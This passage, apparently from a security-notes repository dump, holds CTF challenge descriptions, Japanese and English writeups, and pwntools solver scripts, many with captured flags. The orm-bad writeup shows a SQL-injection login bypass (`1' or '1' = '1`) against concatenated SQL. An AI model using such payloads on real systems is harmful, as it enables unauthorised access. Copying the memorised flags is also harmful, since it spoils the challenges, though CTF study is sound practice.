[]\na, b = 0, 0\nfor _ in range(length):\n a += getrandbits(32) + b\n b += a\n A.append(a)\n\np = getStrongPrime(512)\nq = getStrongPrime(512)\n\nassert q > sum(A)\n\npub_key = [a * p % q for a in A]\ncipher = sum([int(flag[i]) * pub_key[i] for i in range(length)])\n\nf = open(\"output.txt\", \"w\")\nf.write(\"pub_key = \" + str(pub_key) + \"\\n\")\nf.write(\"cipher = \" + str(cipher) + \"\\n\")\nf.close()\n\n" }, { "alpha_fraction": 0.6894736886024475, "alphanum_fraction": 0.7736842036247253, "avg_line_length": 30.66666603088379, "blob_id": "50ce1e2379bf33f5d5cc64dc0caa379e895f6b28", "content_id": "c10e34d95372c4b3999665b854bd6f303bdee443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 190, "license_type": "no_license", "max_line_length": 100, "num_lines": 6, "path": "/2021/HeroCTF_v3/Find_Me/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Could you retrieve where this photo was taken ?\n\nFormat : Hero{place}\nAuthor : xanhacks\n\n[find_me.jpg](https://www.heroctf.fr/files/5aa5da2b04f0a3f9fa86f70c2dd825ae/find_me.jpg?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjIyfQ.YIUtng.3apAvQer1fGko_-NZQbb6yGxw-o)\n" }, { "alpha_fraction": 0.5981308221817017, "alphanum_fraction": 0.8177570104598999, "avg_line_length": 42, "blob_id": "a0638be6d3f29db9ab661e8b40d977e340ab29ab", "content_id": "a3d5d609dec2dc49dc340d38399246cfbcae7233", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 214, "license_type": "no_license", "max_line_length": 103, "num_lines": 5, "path": "/2021/angstromCTF_2021/Sea_of_Quills/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Come check out our [finest selection of quills](https://seaofquills.2021.chall.actf.co/)!\n\n[app.rb](https://files.actf.co/c6131fafd681ef59ee5167822702986f813b0e3177f3f7c78f1790adaac92384/app.rb)\n\nAuthor: JoshDaBosh" }, { "alpha_fraction": 0.5165975093841553, "alphanum_fraction": 0.5373443961143494, "avg_line_length": 23.149999618530273, "blob_id": "ad4f4bedc99a45e2a306a46a5095edc218959e77", "content_id": "f6ce29ebca6edba99adadea39d83c78a7fb0305b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 482, "license_type": "no_license", "max_line_length": 50, "num_lines": 20, "path": "/2021/BCACTF_2.0/Welcome_to_the_Casino/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nPARALLEL = 20\n\nio = [ _ for _ in range(PARALLEL)]\nwhile(True):\n for i in range(PARALLEL):\n io[i] = remote('misc.bcactf.com', 
'49156')\n\n for i in range(PARALLEL):\n io[i].recvuntil('Enter the letter \"')\n char = io[i].recvn(1).decode('utf-8')\n io[i].recvline()\n io[i].sendline(char)\n\n for i in range(PARALLEL):\n out = io[i].recvall().decode('utf-8')\n print(out)\n if 'bcactf' in out:\n exit()" }, { "alpha_fraction": 0.6056700944900513, "alphanum_fraction": 0.657216489315033, "avg_line_length": 19.421052932739258, "blob_id": "f41261165123bbfe539b58f548c842e1018a0638", "content_id": "84adb9322731434659aa541f1b84d703207c9e90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 540, "license_type": "no_license", "max_line_length": 130, "num_lines": 19, "path": "/2021/redpwnCTF_2021/orm-bad/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttps://orm-bad.mc.ax/ にアクセスする。\n\nページのソースコードが与えられており、以下のSQL文を実行するようになっている。\n\n```js\ndb.all(\"SELECT * FROM users WHERE username='\" + req.body.username + \"' AND password='\" + req.body.password + \"'\", (err, rows) => {\n```\n\nUsername: `admin`\n\nPassword: `1' or '1' = '1`\n\nと入力したところ、adminでログインすることができ、フラグが得られた。\n\n![](img/2021-07-10-12-15-12.png)\n\n<!-- flag{sqli_overused_again_0b4f6} -->\n" }, { "alpha_fraction": 0.4963414669036865, "alphanum_fraction": 0.5182926654815674, "avg_line_length": 25.45161247253418, "blob_id": "f5094e037a440ed131f09d586880d1fe733fbaf4", "content_id": "a3e8659c48d5483493e5d35acb6d708b71113d3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 820, "license_type": "no_license", "max_line_length": 59, "num_lines": 31, "path": "/2021/ImaginaryCTF_2021/Imaginary/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\nimport re\nfrom tqdm import tqdm\n\nio = remote('chal.imaginaryctf.org', '42015')\n\nio.recvuntil('so watch out!)\\n\\n')\n\nfor _ in tqdm(range(300)):\n out = io.recvline().decode('utf-8')\n nums = list(re.findall(r'\\(([0-9i+-]+)\\)', out))\n opts = list(re.findall(r'\\) ([+-]) \\(', out))\n opts = ['+'] + opts # first number is positive\n real, image = 0, 0\n for idx, num in enumerate(nums):\n num = list(map(int, list(re.findall(r'\\d+', num))))\n if opts[idx] == '+':\n real += num[0]\n image += num[1]\n else:\n real -= num[0]\n image -= num[1]\n if image >= 0:\n io.sendline(f'{real}+{image}i')\n else:\n io.sendline(f'{real}{image}i')\n if b'Correct!' 
not in io.recvline():\n break\n\nio.interactive()\nio.close()\n" }, { "alpha_fraction": 0.32003986835479736, "alphanum_fraction": 0.3878364861011505, "avg_line_length": 27.685714721679688, "blob_id": "efac645b5b69df7adac8ba7d6dc1f9ba094ab106", "content_id": "a3bd3070c0a625b262643deb671b61a332d1ccaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1013, "license_type": "no_license", "max_line_length": 89, "num_lines": 35, "path": "/2020/CyberSecurityRumble2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# CyberSecurityRumble CTF\n\n* http://ctf.cybersecurityrumble.de/\n\n* 2020/10/31 04:00 JST — 2020/11/02 04:00 JST\n\n---\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------------ | ---------------------- | -------------------- | ----: | -----: |\n| Web | [Cyberwall](Cyberwall) | OS Command Injection | 100 | 389 |\n| Crypto | [Hashfun](Hashfun) | XOR | 100 | 267 |\n| Reversing, C | [Zeh](Zeh) | XOR | 100 | 221 |\n\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ---- | ---------------------------------- | ------------------------ | ----: | -----: |\n| Math | [Pady McPadface](Pady_McPadface) | Quadratic residue (平方剰余) | 200 | 18 |\n| Web | [Wheels n Whales](Wheels_n_Whales) | PyYAML | 100 | 94 |\n\n---\n\n## Result\n\n* 300 points\n\n* 259 / 980 (all)\n\n* 259 / 474 (> 1 pt)" }, { "alpha_fraction": 0.6605504751205444, "alphanum_fraction": 0.7568807601928711, "avg_line_length": 15.84615421295166, "blob_id": "7a58d49f8b003bbabbd0ddcec84c1fc50d6b3f54", "content_id": "cad3a83e3fb289d36c5309b50a32ee0c43fba564", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 424, "license_type": "no_license", "max_line_length": 55, "num_lines": 13, "path": "/2021/UMassCTF_2021/Scan_Me/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n与えられた画像をGIMPで開くと、レイヤーが2つあることが分かった。下のレイヤーにはQRコードが書かれていた。\n\n![](img/2021-03-28-02-10-31.png)\n\n一部欠けているが読み取ることができ、以下のページへ飛ぶ。\n\n* https://imgur.com/a/57VgQ8M\n\nフラグが書かれた画像ファイルがアップロードされている。\n\n<!-- UMASS{QR-3Z-m0d3} -->" }, { "alpha_fraction": 0.4544450640678406, "alphanum_fraction": 0.5427940487861633, "avg_line_length": 22.828947067260742, "blob_id": "ba0727fcda0410af57debb147749aaf8716177e5", "content_id": "5e216d74bf637b9291c46c0ab3f97defeaf906fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1843, "license_type": "no_license", "max_line_length": 100, "num_lines": 76, "path": "/2021/angstromCTF_2021/FREE_FLAGS!!1!!/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n```c\n local_10 = *(long *)(in_FS_OFFSET + 0x28);\n puts(\n \"Congratulations! You are the 1000th CTFer!!! Fill out this short survey to get FREE FLAGS!!!\"\n );\n puts(\"What number am I thinking of???\");\n __isoc99_scanf(\"%d\",&local_11c);\n if (local_11c == 0x7a69) {\n puts(\"What two numbers am I thinking of???\");\n __isoc99_scanf(\"%d %d\",&local_120,&local_124);\n if ((local_120 + local_124 == 0x476) && (local_120 * local_124 == 0x49f59)) {\n puts(\"What animal am I thinking of???\");\n __isoc99_scanf(\" %256s\",local_118);\n sVar2 = strcspn(local_118,\"\\n\");\n local_118[sVar2] = '\\0';\n iVar1 = strcmp(local_118,\"banana\");\n if (iVar1 == 0) {\n puts(\"Wow!!! 
Now I can sell your information to the Russian government!!!\");\n puts(\"Oh yeah, here\\'s the FREE FLAG:\");\n print_flag();\n local_128 = 0;\n }\n else {\n puts(\"Wrong >:((((\");\n local_128 = 1;\n }\n }\n else {\n puts(\"Wrong >:((((\");\n local_128 = 1;\n }\n }\n else {\n puts(\"Wrong >:((((\");\n local_128 = 1;\n }\n if (*(long *)(in_FS_OFFSET + 0x28) == local_10) {\n return local_128;\n }\n```\n\n1. `local_11c == 0x7a69` \n\n2. `local_120 + local_124 == 0x476 && local_120 * local_124 == 0x49f59`\n\n3. `strcmp(local_118,\"banana\")`\n\nを満たす値を入力していけばよい。\n\n```py\nfrom pwn import *\n\ndef solve(b,c):\n a = 1\n b = -b\n x1 = (-b + math.sqrt(b**2-4*a*c))/(2*a)\n x2 = (-b - math.sqrt(b**2-4*a*c))/(2*a)\n return [str(int(x1)), str(int(x2))]\n\nio = remote('shell.actf.co', 21703)\n# 1\nio.recvuntil('What number am I thinking of???')\nio.sendline(str(int(0x7a69)))\n# 2\nio.recvline()\nio.sendline(' '.join(solve(0x476,0x49f59)))\n# 3\nio.recvline()\nio.sendline('banana')\n\nio.interactive()\n```\n\n<!-- actf{what_do_you_mean_bananas_arent_animals} -->\n" }, { "alpha_fraction": 0.6236461997032166, "alphanum_fraction": 0.6633573770523071, "avg_line_length": 18.76785659790039, "blob_id": "0e53f94bb082dcd4b24647aca95ff6ce5a7f5255", "content_id": "cef7dbba06630bf3f8f04d357225bb7cefce5343", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1528, "license_type": "no_license", "max_line_length": 93, "num_lines": 56, "path": "/2020/WaniCTF/exclusive/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n暗号化のプログラムを読む。\n\n```py\nkey = \"REDACTED\"\nflag = \"FAKE{this_is_fake_flag}\"\n\nassert len(key) == len(flag) == 57\nassert flag.startswith(\"FLAG{\") and flag.endswith(\"}\")\nassert key[0:3] * 19 == key # (1)\n\n\ndef encrypt(s1, s2):\n assert len(s1) == len(s2)\n\n result = \"\"\n for c1, c2 in zip(s1, s2):\n result += chr(ord(c1) ^ ord(c2)) #(2)\n return result\n\n\nciphertext = encrypt(flag, key)\nprint(ciphertext, end=\"\")\n```\n\n(2) より、`flag`と`key`に対して1文字ずつXORを計算していることが分かる。そして、(1) より、`key`は3文字の繰り返しであることも分かる。\n\nXORは同じものを2回演算すると元に戻る性質があるので、`ciphertext`の先頭3文字と`plaintext`の先頭3文字`FLA`をXOR演算して`key`を求めることができる。\n\n`key`が求まったら、`key`を19回繰り返したものと`ciphertext`をXOR演算して`plaintext`を求めることができる。\n\n以下のプログラムを実行してフラグを取得。\n\n```py\n# ファイル読み込み\nwith open('./output.txt') as f:\n ciphertext = f.read()\n\n# s1,s2に対してXOR演算を行う\ndef decrypt(s1, s2):\n assert len(s1) == len(s2)\n\n result = \"\"\n for c1, c2 in zip(s1, s2):\n result += chr(ord(c1) ^ ord(c2))\n return result\n\n# 先頭3文字のXORをとってKeyを計算\nkey = decrypt(ciphertext[0:3],'FLA')\n\n# Keyの繰り返しと暗号文のXORを計算\nplaintext = decrypt(key*19,ciphertext)\n\nprint(plaintext)\n```\n\n" }, { "alpha_fraction": 0.5704077482223511, "alphanum_fraction": 0.6536359786987305, "avg_line_length": 25.44444465637207, "blob_id": "48cdfcf23cb6488a117dbc70522989d92a4b01ff", "content_id": "74d7ed226bff343062ffdab176d1d51b8b049974", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2723, "license_type": "no_license", "max_line_length": 204, "num_lines": 90, "path": "/2021/angstromCTF_2021/Im_so_Random/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n8桁の整数をシードにして生成された2つの乱数の積を当てればフラグが得られる。\n\n```py\nr1 = Generator(random.randint(10000000, 99999999))\nr2 = Generator(random.randint(10000000, 99999999))\n\n...\n\nif guess != r1.getNum() * 
r2.getNum():\n```\n\n現在のシードをもとに次の乱数を作るので、積を元通りに分解することができればよい。\n\n2つの乱数の積に分解するために素因数分解をする。因数の数が多いと積のパターンが増えるため、リトライする。\n\n正しく分解できているかは、その2つの値をシードにして新しい乱数を生成し、積を確かめればよい。\n\n![](img/2021-04-10-04-01-37.png)\n\n```py\nimport os\nos.environ['PWNLIB_NOTERM'] = 'True' # sage & pwntools\n\nfrom pwn import *\nimport re\nimport itertools\n\nclass Generator():\n DIGITS = 8\n def __init__(self, seed):\n self.seed = seed\n assert(len(str(self.seed)) == self.DIGITS)\n\n def getNum(self):\n self.seed = int(str(self.seed**2).rjust(self.DIGITS*2, \"0\")[self.DIGITS//2:self.DIGITS + self.DIGITS//2])\n return self.seed\n\nio = remote('crypto.2021.chall.actf.co','21600')\n\nio.sendline('r')\nr1 = int(re.search(r'\\d+', io.recvline().decode('utf-8')).group())\nprint(r1)\nio.sendline('r')\nr2 = int(re.search(r'\\d+', io.recvline().decode('utf-8')).group())\nprint(r2)\nF = factor(r1)\nf = [f[0] for f in F for _ in range(f[1])]\nif len(f) >= 6:\n io.close()\n exit()\nperm = [p for p in itertools.permutations(f)]\nfound = False\nfor p in perm :\n a = 1\n for n in p:\n if a * n < 99999999:\n a *= n\n else:\n break\n b = r1 // a\n if 10000000 <= a <= 99999999 and 10000000 <= b <= 99999999:\n g1 = Generator(a)\n g2 = Generator(b)\n else:\n continue\n if(g1.getNum()*g2.getNum() == r2):\n found = True\n break\nif found:\n io.sendline('g')\n io.sendline(str(g1.getNum()*g2.getNum()))\n io.sendline(str(g1.getNum()*g2.getNum()))\n io.interactive()\n```\n\n```\n[x] Opening connection to crypto.2021.chall.actf.co on port 21600\n[x] Opening connection to crypto.2021.chall.actf.co on port 21600: Trying 52.207.14.64\n[+] Opening connection to crypto.2021.chall.actf.co on port 21600: Done\n2390425919415506\n1315460154934982\n[*] Switching to interactive mode\nWould you like to get a random output [r], or guess the next random number [g]? What is your guess to the next value generated? What is your guess to the next value generated? Congrats! Here's your flag: \nactf{middle_square_method_more_like_middle_fail_method}\n[*] Got EOF while reading in interactive\n```\n\n<!-- actf{middle_square_method_more_like_middle_fail_method} -->" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7933333516120911, "avg_line_length": 41.85714340209961, "blob_id": "de02937d735731c97edd554533b569bceb9af915", "content_id": "e863f7311c0fc55e58f4bb5d0689c5235ea8d8b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 300, "license_type": "no_license", "max_line_length": 130, "num_lines": 7, "path": "/2021/redpwnCTF_2021/orm-bad/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I just learned about orms today! They seem kinda difficult to implement though... 
Guess I'll stick to good old raw sql statements!\n\n[orm-bad.mc.ax](https://orm-bad.mc.ax/)\n\nDownloads\n\n[app.js](https://static.redpwn.net/uploads/eb4c66c15fe3013340068ef0a34bd5dd5c0c98c567fac53b158d56afe07b511c/app.js)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7973856329917908, "avg_line_length": 50, "blob_id": "91f04f709643eafc2cdad119e043f97e93a90b7b", "content_id": "c3be8178504913b42c6bc679b4e629eea5d58037", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 153, "license_type": "no_license", "max_line_length": 101, "num_lines": 3, "path": "/2021/dCTF_2021/This_one_is_really_basic/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "The answer to life, the universe, and everything.\n\n[cipher.txt](https://dctf.dragonsec.si/files/51555fa45bd2a8345dec6914ad89f3a8/cipher.txt?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTY1fQ.YJ-eBw.kYjrWAZzAGy2ifIzIDgmOM76090)\n" }, { "alpha_fraction": 0.7083333134651184, "alphanum_fraction": 0.7083333134651184, "avg_line_length": 31, "blob_id": "7984121b8b8a8498913709ad3667c4956a68674b", "content_id": "5fb0bd03f9994259eb17264b559f1ebb830f294c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 96, "license_type": "no_license", "max_line_length": 48, "num_lines": 3, "path": "/2021/redpwnCTF_2021/inspect-me/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "See if you can find the flag in the source code!\n\n[inspect-me.mc.ax](https://inspect-me.mc.ax/)\n" } ]
435
cmyk-p4nd4/img_processing
https://github.com/cmyk-p4nd4/img_processing
d5882cbecf856edff64f4b770ab5d9268f578bf5
23bf5dd7e3e1b9234a48d81a37f3cb2883bc518a
01fd6b0a817312b4b85af56d2b6badd21552c8ee
refs/heads/master
2023-01-13T22:06:14.508234
2020-11-17T11:32:21
2020-11-17T11:32:21
312,649,581
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.6496415734291077, "avg_line_length": 33.90625, "blob_id": "ff8dd2cde3475262b9f62720c84e3320b547b37b", "content_id": "86c21df56dd52e4a84de9435840a1603a43f8376", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1116, "license_type": "no_license", "max_line_length": 71, "num_lines": 32, "path": "/extraction.py", "repo_name": "cmyk-p4nd4/img_processing", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import signal\nfrom cv2 import cv2\n\ndef mat2gray(A):\n A = np.double(A)\n out = np.zeros(A.shape, np.double)\n normalized = cv2.normalize(A, out, 1.0, 0.0, cv2.NORM_MINMAX)\n return normalized\n\ndef rgb2gray(rgb):\n return np.dot(rgb[..., :3], [0.299, 0.587, 0.144])\n\nA = plt.imread('sampleImg/test_color.jpg')\nA_gray = rgb2gray(A)\nnc, nr = A_gray.shape\nplt.imsave(\"test_gray.jpg\", A_gray)\nSx = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]]) # Sobel operator\nSy = np.array([[-1, -2, -1], [0, 0, 0], [1, 2, 1]]) # Sobel operator\nAx = signal.correlate2d(A_gray, Sx, mode='same')\nAy = signal.correlate2d(A_gray, Sy, mode='same')\nplt.figure(num=\"Image\")\nplt.subplots_adjust(left=0.0, bottom=0.0, right=1.0, top=1.0)\nplt.subplot(2,2,1); plt.imshow(A); plt.axis('off')\nplt.subplot(2,2,2); plt.imshow(A_gray, cmap='gray'); plt.axis('off')\nplt.subplot(2,2,3); plt.imshow(np.uint8(mat2gray(Ax)*255), cmap='gray')\nplt.axis('off')\nplt.subplot(2,2,4); plt.imshow(np.uint8(mat2gray(Ay)*255), cmap='gray')\nplt.axis('off')\nplt.show()\nprint(A.shape,A_gray.shape)" }, { "alpha_fraction": 0.5561047792434692, "alphanum_fraction": 0.586258053779602, "avg_line_length": 30.625, "blob_id": "e16343d525a6cc03451a1bc3bd5a1902c58f863a", "content_id": "63bcfdca34ee22533929048f9752ca0382a31127", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2023, "license_type": "no_license", "max_line_length": 73, "num_lines": 64, "path": "/SIFT.py", "repo_name": "cmyk-p4nd4/img_processing", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.ndimage.filters import convolve \nimport scipy.ndimage as ndimage\nimport pandas as pd\nfrom cv2 import cv2\n\ndef excelRead(path):\n data = pd.read_excel(path)\n return pd.DataFrame.to_numpy(data)\n\ndef gaussian_filter(sigma): \n size = 2*np.ceil(3*sigma)+1 \n x, y = np.mgrid[-size//2 + 1:size//2 + 1, -size//2 + 1:size//2 + 1] \n g = np.exp(-((x**2 + y**2)/(2.0*sigma**2))) / (2*np.pi*sigma**2)\n return g/g.sum()\n\ndef generate_octave(init_level, s, sigma): \n octave = [init_level] \n k = 2**(1/s) \n kernel = gaussian_filter(k * sigma) \n for _ in range(s+2): \n next_level = convolve(octave[-1], kernel) \n octave.append(next_level) \n return octave\n\ndef generate_gaussian_pyramid(im, num_octave, s, sigma): \n pyr = [] \n for _ in range(num_octave): \n octave = generate_octave(im, s, sigma) \n pyr.append(octave) \n im = octave[-3][::2, ::2] \n return pyr\n\ndef generate_DoG_octave(gaussian_octave): \n octave = [] \n for i in range(1, len(gaussian_octave)): \n octave.append(gaussian_octave[i] - gaussian_octave[i-1])\n return np.concatenate([o[:,:,np.newaxis] for o in octave], axis=2) \n\ndef generate_DoG_pyramid(gaussian_pyramid): \n pyr = [] \n for gaussian_octave in gaussian_pyramid: \n pyr.append(generate_DoG_octave(gaussian_octave)) \n return pyr\n\ndef get_candidate_keypoints(D, w=16): \n candidates = [] \n D[:,:,0] = 0 \n D[:,:,-1] = 0 \n patch = 
np.zeros(shape=D.shape)\n for i in range(w//2+1, D.shape[0]-w//2-1): \n for j in range(w//2+1, D.shape[1]-w//2-1): \n for k in range(1, D.shape[2]-1): \n patch = D[i-1:i+2, j-1:j+2, k-1:k+2] \n if np.argmax(patch[k]) == 4 or np.argmin(patch[k]) == 4: \n candidates.append((i, j, k)) \n return candidates\n \n\nI = excelRead(\"image.xlsx\")\npyr = generate_gaussian_pyramid(I, 4, 1, 1)\nD = generate_DoG_pyramid(pyr)\ncand = get_candidate_keypoints(D[1])\nprint(f'Keypoints: {cand}')" }, { "alpha_fraction": 0.48520389199256897, "alphanum_fraction": 0.5113677382469177, "avg_line_length": 35.67549514770508, "blob_id": "d534b21ae7a3785cf71aabfb820bc42870272d3f", "content_id": "24d3010da907322b5aafd4ad8c2a74dded82175c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5542, "license_type": "no_license", "max_line_length": 106, "num_lines": 151, "path": "/interptDetector.py", "repo_name": "cmyk-p4nd4/img_processing", "src_encoding": "UTF-8", "text": "import numpy as np\nimport scipy.ndimage as ndimage\nimport pandas as pd\nfrom cv2 import cv2\n\ndef gaussianfilter(shape=(5,5), sigma = 1):\n m,n = [(ss-1.)/2. for ss in shape]\n y,x = np.ogrid[-m:m+1, -n:n+1]\n h = np.exp( -(x*x + y*y) / (2.*sigma**2))\n h[ h < np.finfo(h.dtype).eps*h.max() ] = 0\n sumh = h.sum()\n if sumh != 0:\n h /= sumh\n return h\n\ndef excelRead(path):\n data = pd.read_excel(path)\n return pd.DataFrame.to_numpy(data, dtype=np.float64)\n\ndef ConvGauss(L: np.ndarray, filter: np.ndarray, k):\n L2 = L.copy()\n for i in range(0,k):\n L2 = ndimage.correlate(L2, filter, mode='nearest')\n return L2\n\ndef getDiffGauss(I: np.ndarray, filter: np.ndarray):\n nr, nc = I.shape\n stack = np.zeros(shape=(4, nr, nc))\n stack[0] = I\n diff = np.zeros(shape=(3, nr, nc))\n for i in range(1, 4):\n stack[i] = ConvGauss(I, filter, i)\n diff[i-1] = stack[i] - stack[i-1]\n return diff\n\ndef getExtremaSingle(diff: np.ndarray, layer: int):\n points = []\n nr, nc = diff[layer].shape\n patch = np.zeros(shape=(3,3))\n for r in range(nr):\n for c in range(nc):\n for i in range(-1, 2):\n for j in range(-1, 2):\n if r+i < 0 or c+j < 0 or r+i >= nr or c+j >= nc:\n patch[i+1, j+1] = 0\n else:\n patch[i+1, j+1] = diff[layer, r+i, c+j]\n if (np.argmax(patch) == 4 or np.argmin(patch) == 4):\n points.append((r, c))\n return points\n \ndef getExtrema(diff: np.ndarray):\n points = []\n patch = np.zeros(shape=(27))\n l,nr,nc = diff.shape\n for r in range(0, nr):\n for c in range(0, nc):\n for s in range(0,3):\n for i in range(-1, 2):\n for j in range(-1, 2):\n if r+i < 0 or c+j < 0:\n patch[3*s+(i+1)+(j+1)] = 0\n else:\n patch[3*s+(i+1)+(j+1)] = diff[s, r+i-1, c+j-1]\n #print(patch)\n if np.argmax(patch) == 13 or np.argmin(patch) == 13:\n points.append((r, c))\n return points\n\ndef saveKeypoints(I:np.ndarray, points: list, diff: np.ndarray):\n import xlwt\n from xlwt import Workbook\n\n style1 = xlwt.easyxf('pattern: pattern solid, fore_colour yellow;''align: vert centre, horiz center;')\n style2 = xlwt.easyxf('pattern: pattern solid, fore_colour aqua;''align: vert centre, horiz center')\n reset = xlwt.easyxf('align: vert centre, horiz center',\"0.0000\")\n reset2 = xlwt.easyxf('align: vert centre, horiz center')\n\n book = Workbook()\n sheet1 = book.add_sheet(\"highlight\", cell_overwrite_ok=True)\n sheet2 = book.add_sheet(\"weak\", cell_overwrite_ok=True)\n sheet3 = book.add_sheet(\"combine\", cell_overwrite_ok=True)\n sheet4 = book.add_sheet(\"diff\", cell_overwrite_ok=True)\n\n nr, nc = I.shape\n wPoints = 
[]\n for i in range(nr):\n for j in range(nc):\n sheet1.write(i, j, float(I[i, j]), reset2)\n sheet2.write(i, j, float(I[i, j]), reset2)\n sheet3.write(i, j, float(I[i, j]), reset2)\n sheet4.write(i, j, float(diff[0, i, j]), reset)\n if (i,j) in points:\n sheet1.write(i, j, float(I[i, j]), style1)\n sheet3.write(i, j, float(I[i, j]), style1)\n if diff[0, i, j] < 1.0:\n sheet2.write(i, j, float(I[i, j]), style2)\n sheet3.write(i, j, float(I[i, j]), style2)\n wPoints.append((i, j))\n book.save(\"highlight.xls\")\n return [x for x in points if x not in wPoints]\n\ndef getPointR(I: np.ndarray, points: list, diff:np.ndarray):\n import copy\n sPoints = copy.deepcopy(points)\n Sx = np.array([-1, 0, 1])\n Sy = Sx.reshape(3,1)\n Dx = ndimage.correlate1d(diff, Sx, mode='constant')\n Dxx = ndimage.correlate1d(Dx, Sx, mode= 'constant')\n Dy = ndimage.correlate(diff, Sy, mode='constant')\n Dyy = ndimage.correlate(Dy, Sy, mode='constant')\n Dxy = ndimage.correlate(Dx, Sy, mode='constant')\n R = np.zeros(shape=diff.shape)\n nr, nc = R.shape\n for i in range(nr):\n for j in range(nc):\n if (i, j) in points:\n tr = Dxx[i, j] + Dyy[i, j]\n det = Dxx[i, j] * Dyy[i, j] - Dxy[i, j] **2\n R[i, j] = tr**2/det\n return np.around(R, 2)\n\ndef orientationAssg(I: np.ndarray, g1: np.ndarray, keypts: list):\n Sx = np.array([-1, 0, 1])\n Sy = Sx.reshape(3,1)\n Dx = ndimage.correlate1d(I, Sx, mode='nearest')\n Dy = ndimage.correlate(I, Sy, mode='nearest')\n nr, nc = I.shape\n L_mag = np.round(np.sqrt(Dx**2+Dy**2),2)\n L_ang = np.round(np.rad2deg(np.arctan(Dy/(Dx+np.finfo(float).eps))), 2)\n L_ang = np.where(Dx < 0, L_ang+180, L_ang)\n L_ang = np.where(L_ang < 0, 360+L_ang, L_ang)\n L_ang = np.round(L_ang / 45)*45\n khist = np.empty(shape=(len(keypts),8))\n l = 0\n #print(L_mag)\n for i in range(nr):\n for j in range(nc):\n if (i, j) in keypts:\n obin = np.zeros(shape=(8))\n for r in range(-2, 3):\n for c in range(-2,3):\n if r+i < 0 or c+j < 0 or r+i >= nr or c+j >= nc:\n continue\n else:\n obin[int(L_ang[r+i, c+j]//45)] += L_mag[r+i, c+j]\n khist[l] = obin\n l+=1\n if l >= len(keypts):\n return khist\n return -1\n \n\n " }, { "alpha_fraction": 0.5035552978515625, "alphanum_fraction": 0.5460030436515808, "avg_line_length": 36.13600158691406, "blob_id": "0db20afe5c8d9524f6b0ec8771d3467f3172d7ae", "content_id": "ed9aa9428292f1edfc6dc935819a2497d3c1b1d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4641, "license_type": "no_license", "max_line_length": 121, "num_lines": 125, "path": "/HoG.py", "repo_name": "cmyk-p4nd4/img_processing", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import signal\nimport math\n\ndef extractImg(class_no=1, image_no=1, type=\"training\"):\n type = \"training\" if (type == \"training\") else \"test\"\n path = \"sampleImg/\"+str(class_no) + \"/\" + str(class_no) + str(image_no) + '_'+type.capitalize()+\".bmp\"\n return plt.imread(path)\n\ndef rgb2gray(rgb):\n if (rgb.ndim != 3):\n return rgb\n return np.dot(rgb[..., :3], [0.299, 0.587, 0.144])\n\ndef SobelTransform(I):\n Sx = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]])\n Sy = np.array([[-1, -2, -1], [0, 0, 0], [1, 2, 1]])\n Ix = signal.correlate2d(I, Sx, mode='same')\n Iy = signal.correlate2d(I, Sy, mode='same')\n I_mag=np.sqrt(Ix**2 + Iy**2) # I_mag: gradient magnitude\n \n # Gradient orientation\n nr, nc = I.shape\n Ipr = np.zeros(shape=(nr, nc))\n I_angle = np.zeros(shape=(nr, nc))\n for j in range(nr):\n for i in range(nc):\n 
